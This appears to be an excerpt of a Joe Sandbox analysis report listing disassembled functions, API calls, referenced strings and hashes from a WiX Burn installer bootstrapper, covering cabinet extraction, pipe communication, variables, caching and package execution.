Opcode Fuzzy Hash: 6eeb2b1a35f8b864d6822c3120aaea90d3378501925ecadf7729015ea6a2ee23
Instruction Fuzzy Hash: F512BD71A40325ABEB20AA25DC85FAB76E8EB44700F016166FD0DFB281E775CD44DBA1

Function 00E60A77 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 288
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,00E60621,?,?), ref: 00E60A85
GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00E60621,?,?), ref: 00E60A92
WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,00E60621,?,?), ref: 00E60ACE
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00E60621,?,?), ref: 00E60AD8

Strings

Failed to set file pointer to beginning of file., xrefs: 00E60E20
Failed to reset begin operation event., xrefs: 00E60B4B
Failed to wait for begin operation event., xrefs: 00E60B06
Failed to set operation complete event., xrefs: 00E60AC0
Failed to copy stream name: %ls, xrefs: 00E60BB7
Invalid operation for this state., xrefs: 00E60B79
Failed to create file: %ls, xrefs: 00E60D38
cabextract.cpp, xrefs: 00E60AB6, 00E60AFC, 00E60B41, 00E60B6D, 00E60CBE, 00E60D2B, 00E60D7D, 00E60DC2, 00E60E16
Failed to set end of file., xrefs: 00E60DCC
Failed to set file pointer to end of file., xrefs: 00E60D87
Failed to allocate buffer for stream., xrefs: 00E60CC8

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$EventObjectSingleWait
String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
API String ID: 3600396749-2104912459
Opcode ID: 6fa60d6c3c2faa6838a99cee30c4f9a66fdf60ffe8968c5607fbc82b822ede82
Instruction ID: 124fed0d0a8c56e2d3e845866180acec1f8fdfc6a90be8c9aab5bd249f88471d
Opcode Fuzzy Hash: 6fa60d6c3c2faa6838a99cee30c4f9a66fdf60ffe8968c5607fbc82b822ede82
Instruction Fuzzy Hash: 4891F272A80731BFEB206A7AAD49BA77AD4EF04794F016225FD09FA5A0D761CC0097D1

Function 00E552E3 Relevance: 52.7, APIs: 17, Strings: 13, Instructions: 222
filepipesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(?,?,00000000,?,00E8B4F0,?,00000000,?,00E4442A,?,00E8B4F0), ref: 00E55304
GetCurrentProcessId.KERNEL32(?,00E4442A,?,00E8B4F0), ref: 00E5530F
SetNamedPipeHandleState.KERNELBASE(?,000000FF,00000000,00000000,?,00E4442A,?,00E8B4F0), ref: 00E55346
ConnectNamedPipe.KERNELBASE(?,00000000,?,00E4442A,?,00E8B4F0), ref: 00E5535B
GetLastError.KERNEL32(?,00E4442A,?,00E8B4F0), ref: 00E55365
Sleep.KERNELBASE(00000064,?,00E4442A,?,00E8B4F0), ref: 00E55396
SetNamedPipeHandleState.KERNELBASE(?,00000000,00000000,00000000,?,00E4442A,?,00E8B4F0), ref: 00E553B9
WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,00E4442A,?,00E8B4F0), ref: 00E553D4
WriteFile.KERNEL32(?,*D,00E8B4F0,00000000,00000000,?,00E4442A,?,00E8B4F0), ref: 00E553EF
WriteFile.KERNEL32(?,comres.dll,00000004,feclient.dll,00000000,?,00E4442A,?,00E8B4F0), ref: 00E5540A
ReadFile.KERNELBASE(?,wininet.dll,00000004,feclient.dll,00000000,?,00E4442A,?,00E8B4F0), ref: 00E55425
GetLastError.KERNEL32(?,00E4442A,?,00E8B4F0), ref: 00E5547D
GetLastError.KERNEL32(?,00E4442A,?,00E8B4F0), ref: 00E554B1
GetLastError.KERNEL32(?,00E4442A,?,00E8B4F0), ref: 00E554E5
GetLastError.KERNEL32(?,00E4442A,?,00E8B4F0), ref: 00E5557B

Strings

wininet.dll, xrefs: 00E55423
Failed to write our process id to pipe., xrefs: 00E554DB
comres.dll, xrefs: 00E55408
Failed to write secret to pipe., xrefs: 00E5550F
Failed to reset pipe to blocking., xrefs: 00E55574
*D, xrefs: 00E553EB
feclient.dll, xrefs: 00E55402, 00E5541D
pipe.cpp, xrefs: 00E55469, 00E5549D, 00E554D1, 00E55505, 00E55539, 00E5556A, 00E5559B
Failed to read ACK from pipe., xrefs: 00E554A7
Failed to wait for child to connect to pipe., xrefs: 00E55473
crypt32.dll, xrefs: 00E553D2
Failed to write secret length to pipe., xrefs: 00E55543
Failed to set pipe to non-blocking., xrefs: 00E555A5

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
String ID: *D$Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$comres.dll$crypt32.dll$feclient.dll$pipe.cpp$wininet.dll
API String ID: 2944378912-1798257575
Opcode ID: 338f819865e6a46e22d1414d8d86f474fb5371495bbdab52a52aec8346aef739
Instruction ID: 9809970ec88950562127d551e241e6b98844c9fbe002495666ad0a599ba5f69d
Opcode Fuzzy Hash: 338f819865e6a46e22d1414d8d86f474fb5371495bbdab52a52aec8346aef739
Instruction Fuzzy Hash: A561A3B3E40725AAEB10DAB9CC49BEFB6E8AF04742F115525BD09FB190E7648D0487E1

Function 00E4508D Relevance: 44.1, APIs: 5, Strings: 20, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00E4510F

Part of subcall function 00E803F0: InitializeCriticalSection.KERNEL32(00EAB60C,?,00E4511B,00000000,?,?,?,?,?,?), ref: 00E80407

Part of subcall function 00E41209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00E45137,00000000,?), ref: 00E41247
Part of subcall function 00E41209: GetLastError.KERNEL32(?,?,?,00E45137,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00E41251

CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00E4517D

Part of subcall function 00E80CD1: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00E80CF2

GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00E4520F
GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00E45219
CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E4549B

Strings

Failed to get OS info., xrefs: 00E45247
Invalid run mode., xrefs: 00E452F1
Failed to run RunOnce mode., xrefs: 00E45314
Failed to initialize COM., xrefs: 00E45189
Failed to initialize core., xrefs: 00E452BB
Failed to initialize XML util., xrefs: 00E451F1
Failed to initialize Cryputil., xrefs: 00E4519E
Failed to run untrusted mode., xrefs: 00E453AE
Failed to parse command line., xrefs: 00E4513D
Failed to initialize Wiutil., xrefs: 00E451D9
Failed to run per-machine mode., xrefs: 00E45364
3.10.4.4718, xrefs: 00E4527C
Failed to initialize Regutil., xrefs: 00E451C1
txt, xrefs: 00E453F2
Failed to run per-user mode., xrefs: 00E4538C
user.cpp, xrefs: 00E4523D
Failed to initialize user state., xrefs: 00E45164
Setup, xrefs: 00E453FC
Failed to run embedded mode., xrefs: 00E4533C
_Failed, xrefs: 00E453F7

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
String ID: 3.10.4.4718$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize user state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$Setup$_Failed$user.cpp$txt
API String ID: 3262001429-867073019
Opcode ID: 82279a2a6ac971daf1261edc6a46862b4057b2ec8bdc9ef511d501555728f0d9
Instruction ID: 10bcdfcedf4b5154f683d8f692dd592178605f914d66dea5ea24365b337a3c4f
Opcode Fuzzy Hash: 82279a2a6ac971daf1261edc6a46862b4057b2ec8bdc9ef511d501555728f0d9
Instruction Fuzzy Hash: C4B1B473D41B299BDB32AE64EC46BED76E4AB44701F0420D5F90DB6252DB709E848F90

Function 00E4567D Relevance: 42.5, APIs: 5, Strings: 19, Instructions: 476
stringCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(000002C0,00000100,00000100,00000000,00000000,?,00E499BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 00E456A2
lstrlenW.KERNEL32(00000000,?,00E499BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 00E456AC
_wcschr.LIBVCRUNTIME ref: 00E458B4
LeaveCriticalSection.KERNEL32(000002C0,00000000,00000000,00000000,00000000,00000000,00000001,?,00E499BB,000002C0,?,00000000,00000000,000002C0,00000100,000002C0), ref: 00E45B56

Strings

*****, xrefs: 00E45820
Failed to append string., xrefs: 00E45728
variable.cpp, xrefs: 00E4590A, 00E4592B, 00E45984, 00E459D0, 00E45A60, 00E45A95, 00E45B0D
Failed to reallocate variable array., xrefs: 00E45938
[%d], xrefs: 00E4586F
Failed to get variable name., xrefs: 00E45998
Failed to allocate buffer for format string., xrefs: 00E456CA
Failed to allocate variable array., xrefs: 00E45991
Failed to format placeholder string., xrefs: 00E45963
Failed to set variable value., xrefs: 00E4596D
Failed to copy string., xrefs: 00E45B3A
Failed to allocate record., xrefs: 00E45917
Failed to determine variable visibility: '%ls'., xrefs: 00E45946
Failed to get formatted length., xrefs: 00E45A6D
Failed to append placeholder., xrefs: 00E45959
Failed to allocate string., xrefs: 00E45AD1
Failed to format record., xrefs: 00E45B1A
Failed to set record format string., xrefs: 00E459DD
Failed to set record string., xrefs: 00E45AA2

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave_wcschrlstrlen
String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$variable.cpp
API String ID: 1026845265-2050445661
Opcode ID: 99e490766bcccdf9c93182aff429dbaed827e2337e25240d17ab644c5d2e7ac5
Instruction ID: d37eb84723c043df49202acea4b076ff782a26d6999b87b9e940c6adf393e028
Opcode Fuzzy Hash: 99e490766bcccdf9c93182aff429dbaed827e2337e25240d17ab644c5d2e7ac5
Instruction Fuzzy Hash: B6F1C172D00719FBDB11AFA4AC45AAF7BE4EB44750F11612AFD19BB281D7749E00CBA0

Function 00E47503 Relevance: 36.4, APIs: 1, Strings: 23, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(xs,00E452B5,00000000,00E4533D), ref: 00E47523

Strings

WixBundleForcedRestartPackage, xrefs: 00E47CF0
=S, xrefs: 00E47DFE
Failed to add built-in variable: %ls., xrefs: 00E47DF0
WixBundleAction, xrefs: 00E47C90
WixBundleVersion, xrefs: 00E47DAC
InstallerVersion, xrefs: 00E4771E
WixBundleProviderKey, xrefs: 00E47D5A
WixBundleTag, xrefs: 00E47D99
', xrefs: 00E477E2
$, xrefs: 00E47C54
LogonUser, xrefs: 00E477B2
xs, xrefs: 00E47516, 00E4751C
WixBundleSourceProcessFolder, xrefs: 00E47D86
WixBundleActiveParent, xrefs: 00E47D47
WixBundleInstalled, xrefs: 00E47D12
WixBundleExecutePackageCacheFolder, xrefs: 00E47CAC
WixBundleElevated, xrefs: 00E47D2E
#, xrefs: 00E4759C
Date, xrefs: 00E47642
InstallerName, xrefs: 00E476F8
0, xrefs: 00E4753D
WixBundleExecutePackageAction, xrefs: 00E47CCE
WixBundleSourceProcessPath, xrefs: 00E47D6D

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: #$$$'$0$=S$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleVersion$xs
API String ID: 32694325-1423981238
Opcode ID: a5238206e339b6f0c467f6d9736416fb16e1422697c708eaa5ab7375c9058021
Instruction ID: c7ab2ec4cca005452a58fc9c11ff24f2a5cb95a00b8dcf720b08e00d196260fd
Opcode Fuzzy Hash: a5238206e339b6f0c467f6d9736416fb16e1422697c708eaa5ab7375c9058021
Instruction Fuzzy Hash: 9E324DB0C213798BDB65DF5999897CDBAB8BB89B04F5091DBE10CB6211D7B00B84CF94

Function 00E57337 Relevance: 35.3, APIs: 1, Strings: 19, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to load catalog files., xrefs: 00E575FD
Failed to get manifest stream from container., xrefs: 00E573D9
Failed to get unique temporary folder for bootstrapper application., xrefs: 00E575BC
Failed to set original source variable., xrefs: 00E57558
Failed to open manifest stream., xrefs: 00E573B8
Failed to set source process path variable., xrefs: 00E574F7
Failed to parse command line., xrefs: 00E57474
Failed to overwrite the %ls built-in variable., xrefs: 00E574C9
WixBundleOriginalSource, xrefs: 00E57547
Failed to extract bootstrapper application payloads., xrefs: 00E575DD
Failed to get source process folder from path., xrefs: 00E57513
WixBundleSourceProcessFolder, xrefs: 00E57522
Failed to load manifest., xrefs: 00E573F5
Failed to open attached UX container., xrefs: 00E5739B
WixBundleElevated, xrefs: 00E574B3, 00E574C4
Failed to initialize internal cache functionality., xrefs: 00E5758D
Failed to initialize variables., xrefs: 00E5737E
Failed to set source process folder variable., xrefs: 00E57533
WixBundleSourceProcessPath, xrefs: 00E574E6

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CriticalInitializeSection
String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath
API String ID: 32694325-252221001
Opcode ID: 2ec64234754bdb4db5a88786a78eeacc1abf8ebac181e92275c74e68aeee7da8
Instruction ID: 10a10ef249cf9913cf428e47e4300162ca57b806eb701449a646c2275d59b626
Opcode Fuzzy Hash: 2ec64234754bdb4db5a88786a78eeacc1abf8ebac181e92275c74e68aeee7da8
Instruction Fuzzy Hash: F091C6B2D44A19BFCB12DAA4DC41EEEB7ACBF04311F102626F955F7140E770AA5887D0

Function 00E584C4 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 205
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00E44CB6,?,?,00000000,00E44CB6,00000000), ref: 00E58507
GetLastError.KERNEL32 ref: 00E58514
CloseHandle.KERNELBASE(00000000,?,00000000,00E8B4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E586F6

Strings

Failed to seek to beginning of user file: %ls, xrefs: 00E5856D
Failed to create user file at path: %ls, xrefs: 00E58545
Failed to seek to original data in exe burn section header., xrefs: 00E586CF
cache.cpp, xrefs: 00E58538, 00E585EF, 00E58656, 00E586C5
Failed to seek to checksum in exe header., xrefs: 00E585F9
Failed to zero out original data offset., xrefs: 00E586E8
msi.dll, xrefs: 00E58608
cabinet.dll, xrefs: 00E5866F
Failed to seek to signature table in exe header., xrefs: 00E58660
Failed to update signature offset., xrefs: 00E58615
Failed to copy user from: %ls to: %ls, xrefs: 00E5859C

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: Failed to copy user from: %ls to: %ls$Failed to create user file at path: %ls$Failed to seek to beginning of user file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
API String ID: 2528220319-1976062716
Opcode ID: 5d51f98eea2c89dfaf04516573a1fc6dc268920131b0aa15e8016521d58e10a3
Instruction ID: cb36fcf34fc545ddc9562ccff44f09f2ad2337f7bf8d42ca10c9c69e8063cf38
Opcode Fuzzy Hash: 5d51f98eea2c89dfaf04516573a1fc6dc268920131b0aa15e8016521d58e10a3
Instruction Fuzzy Hash: 1A5107B2A51721BFEB116A698D49FBF36D8EB04751F011125FD08FB281EB648C0897E5

Function 00E580AE Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000000,00000000,?,?), ref: 00E58104

Part of subcall function 00E8076C: OpenProcessToken.ADVAPI32(?,00000008,?,?,?,?,?,?,?,00E58110,00000000), ref: 00E8078A
Part of subcall function 00E8076C: GetLastError.KERNEL32(?,?,?,?,00E58110,00000000), ref: 00E80794
Part of subcall function 00E8076C: CloseHandle.KERNELBASE(?,?,?,?,?,00E58110,00000000), ref: 00E8081D

GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00E5812A
GetLastError.KERNEL32 ref: 00E58134
GetTempPathW.KERNEL32(00000104,?,00000000), ref: 00E581B1
GetLastError.KERNEL32 ref: 00E581BB

Strings

Failed to ensure windows path for working folder ended in backslash., xrefs: 00E5817F
Failed to copy working folder path., xrefs: 00E5827F
Failed to concat Temp directory on windows path for working folder., xrefs: 00E581A1
%ls%ls\, xrefs: 00E5824C
cache.cpp, xrefs: 00E58158, 00E581DF, 00E58230
Failed to convert working folder guid into string., xrefs: 00E5823A
Failed to get windows path for working folder., xrefs: 00E58162
Temp\, xrefs: 00E58189
4#v, xrefs: 00E581B1
Failed to create working folder guid., xrefs: 00E58207
Failed to append bundle id on to temp path for working folder., xrefs: 00E58264
Failed to get temp path for working folder., xrefs: 00E581E9

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$Process$CloseCurrentDirectoryHandleOpenPathTempTokenWindows
String ID: 4#v$%ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
API String ID: 348923985-3587817078
Opcode ID: 7e7dcccc2076a4ebddc3601677e7c3ffbbe2146d422c9bc1d66b20d46e0e96fd
Instruction ID: 15685977c2b643de184d5d6926d02352702c62453ced2327230a6eddde54f832
Opcode Fuzzy Hash: 7e7dcccc2076a4ebddc3601677e7c3ffbbe2146d422c9bc1d66b20d46e0e96fd
Instruction Fuzzy Hash: CE412872B41724ABEF20A6B5DE49FAB77E89B04701F002562FD09F7150EA749D088BE1

Function 00E69BB3 Relevance: 30.0, APIs: 4, Strings: 13, Instructions: 230threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,00E6BA53,00000001), ref: 00E69C18
GetLastError.KERNEL32(?,00E6BA53,00000001), ref: 00E69D88
GetExitCodeThread.KERNEL32(00000001,00000000,?,00E6BA53,00000001), ref: 00E69DC8
GetLastError.KERNEL32(?,00E6BA53,00000001), ref: 00E69DD2

Strings

Failed to execute package provider registration action., xrefs: 00E69CE9
Failed to load compatible package on per-machine package., xrefs: 00E69D2E
Failed to execute dependency action., xrefs: 00E69D08
Cache thread exited unexpectedly., xrefs: 00E69E14
Failed to execute MSP package., xrefs: 00E69C9D
Failed to execute MSU package., xrefs: 00E69CCD
Failed to execute MSI package., xrefs: 00E69C78
Invalid execute action., xrefs: 00E69E23
Failed to execute compatible package action., xrefs: 00E69D45
Failed to execute EXE package., xrefs: 00E69C4F
apply.cpp, xrefs: 00E69DAC, 00E69DF6
Failed to wait for cache check-point., xrefs: 00E69DB9
Failed to get cache thread exit code., xrefs: 00E69E03

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
String ID: Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
API String ID: 3703294532-2662572847
Opcode ID: 3e2450a277a560f49f16a34ecb0f8b5655d85dc4b2d5125625ab34ff8b4da47e
Instruction ID: c28cfc5a134a3756670f235d64fb80beb2cec991ef2fd6de6dd51f80160e47bf
Opcode Fuzzy Hash: 3e2450a277a560f49f16a34ecb0f8b5655d85dc4b2d5125625ab34ff8b4da47e
Instruction Fuzzy Hash: DE716A71A81319EFDF14DF64E945AAEB7FCEB48B50F10616AF805F7252D2709E009BA0

Function 00E63870 Relevance: 28.6, APIs: 1, Strings: 15, Instructions: 589COMMON

Download Yara Rule

Strings

msiuser.cpp, xrefs: 00E639F5, 00E63AF6, 00E63F3D, 00E63F54
UX aborted detect related MSI package., xrefs: 00E639FF
Failed to get product information for ProductCode: %ls, xrefs: 00E63A1F
UX aborted detect compatible MSI package., xrefs: 00E63B00
Failed to convert version: %ls to DWORD64 for ProductCode: %ls, xrefs: 00E6390F
Invalid state value., xrefs: 00E63F47
msasn1.dll, xrefs: 00E639D6, 00E63ADD, 00E63DB3, 00E63EFE
Failed to get version for product in machine context: %ls, xrefs: 00E63EB9
Failed to enum related products., xrefs: 00E63EC3
Failed to query feature state., xrefs: 00E63F2B
Failed to get version for product in user unmanaged context: %ls, xrefs: 00E63E97
Language, xrefs: 00E63CBC
UX aborted detect., xrefs: 00E63F5E
VersionString, xrefs: 00E638CB, 00E63A52, 00E63BAC, 00E63BE3
Failed to copy the installed ProductCode to the package., xrefs: 00E63B20

Memory Dump Source

Source File: 00000003.00000002.3993949843.0000000000E41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000003.00000002.3993758819.0000000000E40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994264400.0000000000E8B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994507155.0000000000EAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.3994704951.0000000000EAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e40000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to copy the installed ProductCode to the package.$Failed to enum related products.$Failed to get product information for ProductCode: %ls$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$Failed to query feature state.$Invalid state value.$Language$UX aborted detect compatible MSI package.$UX aborted detect related MSI package.$UX aborted detect.$VersionString$msasn1.dll$msiuser.cpp
API String ID: 1659193697-2574767977
Opcode ID: ea0182dda575b436d1eb2aafc2b65e8a586dec350a0a4350ba1f5fd9914e6af0
